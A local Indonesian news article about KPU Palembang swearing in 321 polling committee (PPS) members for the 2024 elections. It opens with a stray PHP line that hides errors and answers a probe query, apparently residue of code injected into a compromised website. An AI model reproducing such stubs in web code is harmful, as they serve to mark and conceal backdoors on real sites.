error_reporting(0); set_time_limit(0); if ($_GET['q']=='1'){echo '200'; exit;} Pelantikan dan Pengambilan Sumpah Janji Anggota Panitia Pemungutan Suara Tahun 2024 Kota Palembang - SMI.COM

Home / PALEMBANG

Rabu, 25 Januari 2023 - 04:46 WIB

Pelantikan dan Pengambilan Sumpah Janji Anggota Panitia Pemungutan Suara Tahun 2024 Kota Palembang

Palembang, SMI-

KPU Kota Palembang Adakan kegiatan pengambilan sumpah janji dan orientasi tugas anggota Panitia Pemungutan Suara (PPS) se-Kota Palembang di Aula Hotel Golden Sriwijaya, Selasa (24/1/2023).

Ketua KPU Kota Palembang Syawaludin SHI mengucapkan alhamdulillah hari ini, KPU Kota Palembang sudah melantik anggota PPS se-Kota Palembang berjumlah 321 orang yang tersebar di 107 Kelurahan.

“Setelah dilantik hari ini, insyaallah akhir januari, mereka akan mempersiapkan rekrutmen rekan-rekan Petugas Pemuktahiran Data Pemilih (Pantarlih) dengan jumlah 4899 orang yang tersebar di 107 Kelurahan se-Kota Palembang,” ucapnya.Ia terangkan bahwa Pantarlih bertugas mencongkit Daftar Penduduk Potensial Pemilih Pemilu (DP4) yang memang diturunkan Menteri Dalam Negeri (Mendagri) melalui KPU Republik Indonesia (RI), KPU Provinsi dan KPU Kabupaten Kota.

Baca Juga :  DEKLARASI DAMAI SIAP MENANG SIAP KALAH PASANGAN CALON BUPATI DAN WAKIL BUPATI PILKADA SERENTAK TAHUN 2020

“Insyaallah pertanggal 6, kalau tidak ada perubahan, rekan-rekan Pantarlih susah melaksanakan atau bekerja di Wilayahnya masing-masing,” katanya Syawaludin.

Lanjut Syawaludin mengungkapkan bahwa setelah dilantiknya PPS hari ini, pihaknya menyiapkan pemateri-pemateri dan akan memberikan arahan terkait pembahasan persiapan rekrutmen Pantarlih dan tugas-tugas Pantarlih dilapangan yang akan mencokit data DP4 yang memang langsung bersinggungan dengan masyarakatSetiap pekerjaan dilapangan, pasti ada tantangannya, diantaranya ketika rekan-rekan Pantarlih ke lapangan mencokit data, warganya tidak ada ditempat, tetapi dengan data yang sudah diturunkan ini, kita tetap berusaha maksimal dan yakin DPT Kota Palembang untuk periode 2024 tidak ada masalah,” ujarnya.

Baca Juga :  Gema Wasri Peringati Sumpah Pemuda

Lebih lanjut dia terangkan untuk hak pilih dengan melihat wajib KTP di Kota Palembang berdasarkan DP4 lebih kurang 1.124.000 (satu juta seratus dua puluh empat ribu) mata pilih. (Anjas)

Share :

Baca Juga

PALEMBANG

Irjen Pol A Rachmad Wibowo SIK Mengajak Semua Elemen Untuk Menuntaskan Persoalan Sumur Minyak Masyarakat Terutama Di Daerah Penghasil Migas

PALEMBANG

Kapolda Sumsel Melalui Karorena Polda Sumsel Membuka Rapat Satker Zona Integritas Menuju WBK Dan WBBM

PALEMBANG

Adakan Berbagai Lomba, Proker Srikandi PP Kec Alang-alang Lebar Sukses Digelar

PALEMBANG

“BHAYANGKARI PEDULI DALAM RANGKA HKGB KE 68 “

PALEMBANG

Jumat Berkah, BKPB PP Kota Palembang Bagikan 200 Nasi Kotak Untuk Para Kaum Dhuafa

PALEMBANG

IKA-SMANTA Harus Tetap Eksis

PALEMBANG

Target Vaksinasi Massal Polda Sumsel 31.696 Orang

PALEMBANG

Humas Polda Sumsel Kembali Sampaikan Ungkap Kasus Minggu ke 5 Bulan September